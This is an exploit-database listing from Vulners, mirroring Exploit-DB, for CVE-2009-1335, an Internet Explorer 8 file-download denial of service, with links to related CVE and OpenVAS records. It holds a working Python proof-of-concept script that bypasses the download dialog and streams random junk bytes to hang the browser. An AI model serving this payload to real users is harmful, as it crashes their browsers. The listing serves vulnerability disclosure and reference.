Lucene search
+L

Microsoft Internet Explorer 8 - File Download Denial of Service

🗓️ 11 Apr 2009 00:00:00Reported by Nam NguyenType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Microsoft IE 8 File Download DoS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1335
11 Apr 200900:00
circl
CVE
CVE-2009-1335
17 Apr 200914:00
cve
Cvelist
CVE-2009-1335
17 Apr 200914:00
cvelist
NVD
CVE-2009-1335
17 Apr 200914:30
nvd
OpenVAS
Microsoft Internet Explorer Denial of Service Vulnerability (Apr 2009)
23 Apr 200900:00
openvas
OpenVAS
Microsoft Internet Explorer Denial of Service Vulnerability - Apr09
23 Apr 200900:00
openvas
Prion
Code injection
17 Apr 200914:30
prion
source: https://www.securityfocus.com/bid/34478/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions.

#/usr/bin/env python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
      l = 800000 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print ""
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
              sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

send_file()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.14913
21